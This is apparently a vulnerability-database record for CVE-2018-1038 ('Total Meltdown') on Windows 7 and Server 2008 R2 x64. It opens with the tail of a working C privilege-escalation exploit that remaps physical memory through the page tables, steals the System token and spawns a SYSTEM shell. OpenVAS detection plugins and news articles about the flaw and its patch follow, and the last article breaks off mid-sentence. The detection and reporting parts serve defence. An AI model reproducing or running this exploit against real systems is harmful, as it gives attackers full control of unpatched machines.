NULL;\r\n\tDWORD dwLength = 0, count = 0, type = 0;;\r\n\r\n\tif (!RegOpenKey(HKEY_LOCAL_MACHINE, pszSubKey, &hKey) == ERROR_SUCCESS)\r\n\t{\r\n\t\tprintf(\"[*] Could not get reg key\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tif (!RegQueryValueEx(hKey, pszValueName, 0, &type, NULL, &dwLength) == ERROR_SUCCESS)\r\n\t{\r\n\t\tprintf(\"[*] Could not query hardware key\\n\");\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tlpData = (LPBYTE)malloc(dwLength);\r\n\tRegQueryValueEx(hKey, pszValueName, 0, &type, lpData, &dwLength);\r\n\r\n\tCM_RESOURCE_LIST *resource_list = (CM_RESOURCE_LIST *)lpData;\r\n\r\n\tfor (int i = 0; i < resource_list->Count; i++) {\r\n\t\tfor (int j = 0; j < resource_list->List[0].PartialResourceList.Count; j++) {\r\n\t\t\tif (resource_list->List[i].PartialResourceList.PartialDescriptors[j].Type == 3) {\r\n\t\t\t\tregions->address = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Start.QuadPart;\r\n\t\t\t\tregions->size = resource_list->List[i].PartialResourceList.PartialDescriptors[j].u.Memory.Length;\r\n\t\t\t\tregions++;\r\n\t\t\t\tcount++;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\r\n\treturn count;\r\n}\r\n\r\nint main()\r\n{\r\n\tprintf(\"TotalMeltdown PrivEsc exploit by @_xpn_\\n\");\r\n\tprintf(\" paging code by @UlfFrisk\\n\\n\");\r\n\r\n\tunsigned long long iPML4, vaPML4e, vaPDPT, iPDPT, vaPD, iPD;\r\n\tDWORD done;\r\n\tDWORD count;\r\n\r\n\t// Parse registry for physical memory regions\r\n\tprintf(\"[*] Getting physical memory regions from registry\\n\");\r\n\tstruct memory_region *regions = (struct memory_region *)malloc(sizeof(struct memory_region) * 10);\r\n\r\n\tcount = parse_memory_map(regions);\r\n\tif (count == 0) {\r\n\t\tprintf(\"[X] Could not find physical memory region, quitting\\n\");\r\n\t\treturn 2;\r\n\t}\r\n\r\n\tfor (int i = 0; i < count; i++) {\r\n\t\tprintf(\"[*] Phyiscal memory region found: %p - %p\\n\", regions[i].address, regions[i].address + regions[i].size);\r\n\t}\r\n\r\n\t// Check for vulnerability\r\n\t__try {\r\n\t\tint test = *(unsigned long long *)PML4_BASE;\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\tprintf(\"[X] Could not access PML4 address, system likely not vulnerable\\n\");\r\n\t\treturn 2;\r\n\t}\r\n\r\n\t// setup: PDPT @ fixed hi-jacked physical address: 0x10000\r\n\t// This code uses the PML4 Self-Reference technique discussed, and iterates until we find a \"free\" PML4 entry\r\n\t// we can hijack.\r\n\tfor (iPML4 = 256; iPML4 < 512; iPML4++) {\r\n\t\tvaPML4e = PML4_BASE + (iPML4 << 3);\r\n\t\tif (*(unsigned long long *)vaPML4e) { continue; }\r\n\r\n\t\t// When we find an entry, we add a pointer to the next table (PDPT), which will be\r\n\t\t// stored at the physical address 0x10000\r\n\t\t*(unsigned long long *)vaPML4e = 0x10067;\r\n\t\tbreak;\r\n\t}\r\n\tprintf(\"[*] PML4 Entry Added At Index: %d\\n\", iPML4);\r\n\r\n\t// Here, the PDPT table is referenced via a virtual address.\r\n\t// For example, if we added our hijacked PML4 entry at index 256, this virtual address\r\n\t// would be 0xFFFFF6FB7DA00000 + 0x100000\r\n\t// This allows us to reference the physical address 0x10000 as:\r\n\t// PML4 Index: 1ed | PDPT Index : 1ed |\tPDE Index : 1ed | PT Index : 100\r\n\tvaPDPT = PDP_BASE + (iPML4 << (9 * 1 + 3));\r\n\tprintf(\"[*] PDPT Virtual Address: %p\", vaPDPT);\r\n\r\n\t// 2: setup 31 PDs @ physical addresses 0x11000-0x1f000 with 2MB pages\r\n\t// Below is responsible for adding 31 entries to the PDPT\r\n\tfor (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n\t\t*(unsigned long long *)(vaPDPT + (iPDPT << 3)) = 0x11067 + (iPDPT << 12);\r\n\t}\r\n\r\n\t// For each of the PDs, a further 512 PT's are created. This gives access to\r\n\t// 512 * 32 * 2mb = 33gb physical memory space\r\n\tfor (iPDPT = 0; iPDPT < 31; iPDPT++) {\r\n\t\tif ((iPDPT % 3) == 0)\r\n\t\t\tprintf(\"\\n[*] PD Virtual Addresses: \");\r\n\r\n\t\tvaPD = PD_BASE + (iPML4 << (9 * 2 + 3)) + (iPDPT << (9 * 1 + 3));\r\n\t\tprintf(\"%p \", vaPD);\r\n\r\n\t\tfor (iPD = 0; iPD < 512; iPD++) {\r\n\t\t\t// Below, notice the 0xe7 flags added to each entry.\r\n\t\t\t// This is used to create a 2mb page rather than the standard 4096 byte page.\r\n\t\t\t*(unsigned long long *)(vaPD + (iPD << 3)) = ((iPDPT * 512 + iPD) << 21) | 0xe7;\r\n\t\t}\r\n\t}\r\n\r\n\tprintf(\"\\n[*] Page tables created, we now have access to ~31gb of physical memory\\n\");\r\n\r\n\t#define EPROCESS_IMAGENAME_OFFSET 0x2e0\r\n\t#define EPROCESS_TOKEN_OFFSET 0x208\r\n\t#define EPROCESS_PRIORITY_OFFSET 0xF // This is the offset from IMAGENAME, not from base\r\n\r\n\tunsigned long long ourEPROCESS = 0, systemEPROCESS = 0;\r\n\tunsigned long long exploitVM = 0xffff000000000000 + (iPML4 << (9 * 4 + 3));\r\n\tSTARTUPINFOA si;\r\n\tPROCESS_INFORMATION pi;\r\n\t\r\n\tZeroMemory(&si, sizeof(si));\r\n\tsi.cb = sizeof(si);\r\n\tZeroMemory(&pi, sizeof(pi));\r\n\r\n\tprintf(\"[*] Hunting for _EPROCESS structures in memory\\n\");\r\n\r\n\tfor (int j = 0; j < count; j++) {\r\n\t\tprintf(\"[*] Trying physical region %p - %p\\n\", regions[j].address, regions[j].address + regions[j].size);\r\n\r\n\t\tfor (unsigned long long i = regions[j].address; i < +regions[j].address + regions[j].size; i++) {\r\n\t\t\t\r\n\t\t\t__try {\r\n\t\t\t\t// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n\t\t\t\tif (ourEPROCESS == 0 && memcmp(\"TotalMeltdownP\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n\t\t\t\t\tif (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n\t\t\t\t\t\tourEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n\t\t\t\t\t\tprintf(\"[*] Found our _EPROCESS at %p\\n\", ourEPROCESS);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t// Locate EPROCESS via the IMAGE_FILE_NAME field, and PRIORITY_CLASS field\r\n\t\t\t\telse if (systemEPROCESS == 0 && memcmp(\"System\\0\\0\\0\\0\\0\\0\\0\\0\\0\", (unsigned char *)(exploitVM + i), 14) == 0) {\r\n\t\t\t\t\tif (*(unsigned char *)(exploitVM + i + EPROCESS_PRIORITY_OFFSET) == 0x2) {\r\n\t\t\t\t\t\tsystemEPROCESS = exploitVM + i - EPROCESS_IMAGENAME_OFFSET;\r\n\t\t\t\t\t\tprintf(\"[*] Found System _EPROCESS at %p\\n\", systemEPROCESS);\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\r\n\t\t\t\tif (systemEPROCESS != 0 && ourEPROCESS != 0) {\r\n\t\t\t\t\t// Swap the tokens by copying the pointer to System Token field over our process token\r\n\t\t\t\t\tprintf(\"[*] Copying access token from %p to %p\\n\", systemEPROCESS + EPROCESS_TOKEN_OFFSET, ourEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n\t\t\t\t\t*(unsigned long long *)((char *)ourEPROCESS + EPROCESS_TOKEN_OFFSET) = *(unsigned long long *)((char *)systemEPROCESS + EPROCESS_TOKEN_OFFSET);\r\n\t\t\t\t\tprintf(\"[*] Done, spawning SYSTEM shell...\\n\\n\");\r\n\r\n\t\t\t\t\tCreateProcessA(0,\r\n\t\t\t\t\t\t\"cmd.exe\",\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\tTRUE,\r\n\t\t\t\t\t\t0,\r\n\t\t\t\t\t\tNULL,\r\n\t\t\t\t\t\t\"C:\\\\windows\\\\system32\",\r\n\t\t\t\t\t\t&si,\r\n\t\t\t\t\t\t&pi);\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t__except (EXCEPTION_EXECUTE_HANDLER) {\r\n\t\t\t\tprintf(\"[X] Exception occured, stopping to avoid BSOD\\n\");\r\n\t\t\t\treturn 2;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44581/"}], "openvas": [{"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1038"], "description": "This host is missing a critical security\n update according to Microsoft KB4100480", "modified": "2020-06-04T00:00:00", "published": "2018-03-30T00:00:00", "id": "OPENVAS:1361412562310812848", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812848", "type": "openvas", "title": "Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812848\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-1038\");\n script_bugtraq_id(103549);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-30 13:47:55 +0530 (Fri, 30 Mar 2018)\");\n script_name(\"Microsoft Windows Kernel Elevation of Privilege Vulnerability (KB4100480)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4100480\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to Windows kernel failing\n to properly handle objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode which will empower them to install\n programs, view, change, delete data or create new accounts with full user\n rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for x64-based Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4100480\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"kernel32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24059\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\kernel32.dll\", file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24059\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8415", "CVE-2018-1038", "CVE-2018-8550", "CVE-2018-8553", "CVE-2018-8256", "CVE-2018-8562", "CVE-2018-8570", "CVE-2018-8544", "CVE-2018-8471", "CVE-2018-8589", "CVE-2018-8450", "CVE-2018-8476", "CVE-2018-8563", "CVE-2018-8407", "CVE-2018-8408", "CVE-2018-8552", "CVE-2018-8565"], "description": "This host is missing a critical security\n update according to Microsoft KB4467107.", "modified": "2020-06-04T00:00:00", "published": "2018-11-14T00:00:00", "id": "OPENVAS:1361412562310814173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814173", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4467107)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4467107)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814173\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-8256\", \"CVE-2018-8407\", \"CVE-2018-8408\", \"CVE-2018-8415\",\n \"CVE-2018-8450\", \"CVE-2018-8471\", \"CVE-2018-8476\", \"CVE-2018-8544\",\n \"CVE-2018-8550\", \"CVE-2018-8552\", \"CVE-2018-8553\", \"CVE-2018-8562\",\n \"CVE-2018-8563\", \"CVE-2018-8565\", \"CVE-2018-8570\", \"CVE-2018-8589\",\n \"CVE-2018-1038\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-14 15:25:37 +0530 (Wed, 14 Nov 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4467107)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4467107.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists in Windows App\n Platform and Frameworks, Windows Graphics, Windows Wireless Networking,\n Windows Kernel, and Windows Server.\n\n Please see the references for more details.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode which will empower them to install\n programs, view, change, delete data or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\n\n - Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4467107\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.24291\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.24291\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:28", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "Microsoft released an out-of-band fix on Thursday for a Windows vulnerability introduced earlier this year as a patch. If exploited, the bug could allow an authenticated attacker to install programs, access stored data or create new accounts with full user rights on Windows 7 and Server 2008 R2 machines. No other Windows OS version is impacted.\n\nThe bad patch was delivered via Microsoft\u2019s [January Patch Tuesday update](<https://threatpost.com/microsoft-january-patch-tuesday-update-fixes-16-critical-bugs/129378/>). The fix was meant to protect Windows\u2019 system from memory vulnerabilities associated with Intel\u2019s [CPU bug Meltdown](<https://threatpost.com/intel-patches-cpu-bugs-impacting-millions-of-pcs-servers/128962/>).\n\nResearcher Ulf Frisk, credited for first identifying the flaw, said Microsoft\u2019s botched patch \u201cstopped Meltdown but opened up a vulnerability way worse \u2026 It allowed any process to read the complete memory contents at gigabytes per second, oh \u2013 it was possible to write to arbitrary memory as well.\u201d\n\nAs part of his research, Frisk created a proof-of-concept exploiting the bug, publishing his findings in [a technical break down](<http://blog.frizk.net/2018/03/total-meltdown.html?m=1>).\n\n\u201cWe released a security update for Windows 7 Service Pack 1 (x64) and Windows Server 2008 R2 Service Pack 1 (x64). Customers who apply the updates, or have automatic updates enabled, are protected,\u201d Microsoft said in a statement Thursday.\n\nMicrosoft said the bug ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>)) is a Windows kernel elevation of privilege vulnerability. It said:\n\n> \u201cAn elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\u201d\n\nIn order for an attacker to exploit this vulnerability they would first have to log on to the targeted PC and then run a \u201cspecially crafted\u201d application to hijack the system, according to Microsoft. \u201cThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory,\u201d the [advisory states](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>).\n\nFrisk had originally stated Microsoft\u2019s March Patch Tuesday update corrected the issue. On Thursday, Frisk now says Microsoft\u2019s [March Patch Tuesday update](<https://threatpost.com/microsoft-patches-15-critical-bugs-in-march-patch-tuesday-update/130424/>) did not fix the vulnerability. Frisk has made his proof-of-concept available via a PCILeech direct memory access attack toolkit,[ hosted on GitHub](<https://github.com/ufrisk/pcileech>).\n", "modified": "2018-03-30T18:51:48", "published": "2018-03-30T18:51:48", "id": "THREATPOST:F3ECBE2B14E2562BC2FD58AD4ABA5BC1", "href": "https://threatpost.com/microsoft-fixes-bad-patch-that-left-windows-7-server-2008-open-to-attack/130871/", "type": "threatpost", "title": "Microsoft Fixes Bad Patch That Left Win7, Server 2008 Open to Attack", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:16", "bulletinFamily": "info", "cvelist": ["CVE-2018-1004", "CVE-2018-1010", "CVE-2018-1012", "CVE-2018-1013", "CVE-2018-1015", "CVE-2018-1016", "CVE-2018-1034", "CVE-2018-1038", "CVE-2018-8117"], "description": "Microsoft\u2019s April Patch Tuesday release includes fixes for 66 bugs, 24 of which are rated critical. Notable is Microsoft\u2019s disclosure of a publicly known SharePoint elevation of privilege bug ([CVE-2018-1034](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1034>)), rated important, which has no fix but has not been publicly exploited.\n\nMicrosoft SharePoint Enterprise Server 2016 is the only version impacted by the vulnerability, according to Microsoft. \u201cAn elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server. An authenticated attacker could exploit the vulnerability by sending a specially crafted request to an affected SharePoint server,\u201d Microsoft said.\n\n\u201cA public disclosure means that a vulnerability was discovered and enough detail about the vulnerability or concept code has been released to give attackers a jump start. It does not mean it has been used in the wild. Public disclosures are an indicator of risk. Enough information is out there to give the attacker an edge in creating an exploit to utilize this vulnerability,\u201d said Chris Goettl, product manager at Ivanti regarding the SharePoint vulnerability.\n\nThe April [Security Update Guide](<https://portal.msrc.microsoft.com/en-us/security-guidance>) also covers Internet Explorer, Edge, ChakraCore, Windows, Visual Studio, Microsoft Office and Office Services and Web Apps and Microsoft\u2019s Malware Protection Engine.\n\nSecurity experts say one of the most important patches rolled out Tuesday was actually identified in March ([CVE-2018-1038](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1038>)). That\u2019s when Microsoft [released an out-of-band fix](<https://threatpost.com/microsoft-fixes-bad-patch-that-left-windows-7-server-2008-open-to-attack/130871/>) for a Windows vulnerability introduced with the [January Patch Tuesday update](<https://threatpost.com/microsoft-january-patch-tuesday-update-fixes-16-critical-bugs/129378/>). If exploited, the bug could allow an authenticated attacker to install programs, access stored data or create new accounts with full user rights on Windows 7 and Server 2008 R2 machines.\n\n\u201cWhile this vulnerability was identified between March and April Patch Tuesday\u2019s, CVE-2018-1038 should be a top priority for anyone who has Windows 7 for x64-based Systems or Windows Server 2008 R2 for x64-based Systems, and you have installed any of the servicing updates released during or after January 2018, you need to install 4100480 immediately to be protected from this Elevation of Privilege vulnerability,\u201d Goettl said in his commentary on Patch Tuesday.\n\nAlso of note is a patch for a Microsoft Wireless Keyboard 850 Security Feature Bypass Vulnerability ([CVE-2018-8117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8117>)).\n\n\u201cPatches for hardware are rare, and patches for keyboards are especially rare, so it was somewhat shocking to see this bug detailed. However, the severity of this bug should not be scoffed at,\u201d the Zero Day Initiative\u2019s (ZDI) Dustin Childs said in [an analysis of the vulnerability](<https://www.zerodayinitiative.com/blog/2018/4/10/the-april-2018-security-update-review>). \u201cThis vulnerability could affect you in two ways. First, an attacker could read your keystrokes \u2013 effectively turning your keyboard into a keystroke logger. Everything you type \u2013 passwords, account details, emails \u2013 could be viewed.\u201d\n\nAlternatively, an attacker could also inject keystrokes to an affected system by reusing the keyboard\u2019s AES encryption key.\n\nChilds also warns that a critical Windows VBScript Engine Remote Code Execution Vulnerability ([**CVE-2018-1004**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1004>)) also presents a heightened security risk. \u201cThis critical-rated bug for the VBScript engine acts somewhat like a browser bug, but it\u2019s actually more impactful,\u201d he said. To exploit the vulnerability an attacker hosts a malicious website and tricks a victim to browse the site.\n\n\u201cAn attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d [according to Microsoft](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1004>).\n\nMicrosoft also alerted users to five Graphics Remote Code Execution Vulnerabilities ([**CVE-2018-1010**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1010>)**, **[**-1012**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1012>)**, **[**-1013**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1013>)**, **[**-1015**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1015>)**, **[**-1016**](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1016>)) tied to the Windows Font Library. \u201cEach of these patches covers a vulnerability in embedded fonts that could allow code execution at the logged-on user level. Since there are many ways to view fonts \u2013 web browsing, documents, attachments \u2013 it\u2019s a broad attack surface and attractive to attackers,\u201d ZDI noted.\n\nJimmy Graham, director of product management at Qualys, [noted in online commentary](<https://blog.qualys.com/laws-of-vulnerabilities/2018/04/10/april-patch-tuesday-63-microsoft-vulnerabilities-19-for-adobe>) that, \u201cThe majority of the Microsoft critical vulnerabilities are in browsers and browser-related technologies. It is recommended that these be prioritized for workstation-type devices. Any system that accesses the Internet via a browser should be patched.\u201d\n\nMicrosoft Malware Protection Engine was fixed last week in an out-of-band security update.\n\nEarlier on Tuesday,[ Adobe fixed four critical vulnerabilities](<https://threatpost.com/adobe-patches-four-critical-bugs-in-flash-indesign/131097/>) in its Flash Player and InDesign products as part of its regularly scheduled [April Security Bulletin](<https://threatpost.com/adobe-patches-four-critical-bugs-in-flash-indesign/131097/>). Patches for Adobe Flash Player for Microsoft Edge and IE 11 were part of that update. Adobe said Edge and IE users will each be automatically updated to the latest versions.\n", "modified": "2018-04-10T21:16:16", "published": "2018-04-10T21:16:16", "id": "THREATPOST:4A749C6BAE245B913C6360FD1697CE7C", "href": "https://threatpost.com/microsoft-fixes-66-bugs-in-april-patch-tuesday-release/131127/", "type": "threatpost", "title": "Microsoft Fixes 66 Bugs in April Patch Tuesday Release", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-03-31T13:14:30", "bulletinFamily": "info", "cvelist": ["CVE-2018-1038"], "description": "[](<https://1.bp.blogspot.com/-TSTd2OLw2tk/WrzUI25OFtI/AAAAAAAADKU/XEpFMSbmWbAjiSsx9jN0nY8VuPQp5yLHgCLcBGAs/s1600-e20/intel-min.jpg>)\n\nMeltdown CPU vulnerability was bad, and Microsoft somehow made the flaw even worse on its Windows 7, allowing any unprivileged, user-level application to read content from and even write data to the operating system's kernel memory. \n \nFor those unaware, Spectre and Meltdown were security flaws disclosed by researchers earlier this year in processors from Intel, ARM, and AMD, leaving nearly every PC, server, and mobile phone on the planet vulnerable to data theft. \n \nShortly after the researchers disclosed the [Spectre and Meltdown exploits](<https://thehackernews.com/2018/01/meltdown-spectre-vulnerability.html>), software vendors, including Microsoft, started releasing patches for their systems running a vulnerable version of processors. \n \nHowever, an independent Swedish security researcher **Ulf Frisk** found that Microsoft's security fixes to Windows 7 PCs for the Meltdown flaw\u2014which could allow attackers to read kernel memory at a speed of 120 KBps\u2014is now allowing attackers to read the same kernel memory at a speed of Gbps, making the issue even worse on Windows 7 PCs and Server 2008 R2 boxes. \n \nFrisk is the same researcher who previously discovered a way to [steal the password from virtually any Mac](<https://thehackernews.com/2016/12/hack-macbook-password.html>) laptop in just 30 sec by exploiting flaws in Apple's FileVault disk encryption system, allowing attackers to unlock any Mac system and even decrypt files on its hard drive. \n \nThe discovery is the latest issue surrounding [Meltdown and Spectre patches](<https://thehackernews.com/2018/01/meltdown-spectre-patches.html>) that were sometimes found incomplete and [sometimes broken](<https://thehackernews.com/2018/01/intel-meltdown-spectre-patch.html>), making problems such as spontaneous reboots and other 'unpredictable' system behavior on affected PCs. \n \nAccording to Frisk, the problem with MS' early Meltdown fixes occurs due to a single bit (that controls the permission to access kernel memory) accidentally being flipped from supervisor-only to any-user in a virtual-to-physical-memory translator called PLM4, allowing any user-mode application to access the kernel page tables. \n \nThe PML4 is the base of the 4-level in-memory page table hierarchy that Intel's CPU Memory Management Unit (MMU) uses to translate the virtual memory addresses of a process into physical memory addresses in RAM. \n \nThe correctly set bit normally ensures the kernel has exclusive access to these tables. \n\n\n> \"The User/Supervisor permission bit was set to User in the PML4 self-referencing entry. This made the page tables available to user mode code in every process. The page tables should normally only be accessible by the kernel itself,\" Frisk explains in his [blog post](<http://blog.frizk.net/2018/03/total-meltdown.html>).\n\nTo prove his claim, Frisk also provided a detailed breakdown and a [proof-of-concept exploit](<https://news.ycombinator.com/item?id=16693599>). The issue only affects 64-bit versions of Windows 7 and Windows Server 2008 R2, and not Windows 10 or Windows 8.1 PCs, as they still require attackers to have physical access to a targeted system. \n \n\n\n### Buggy Patch Allows to Read Gigabytes of Data In a Second\n\n \nAlso since the PML4 page table has been located at a fixed memory address in Windows 7, \"no fancy exploits\" are needed to exploit the Meltdown vulnerability. \n\n\n> \"Windows 7 already did the hard work of mapping in the required memory into every running process,\" Frisk said. \"Exploitation was just a matter of read and write to already mapped in-process virtual memory. No 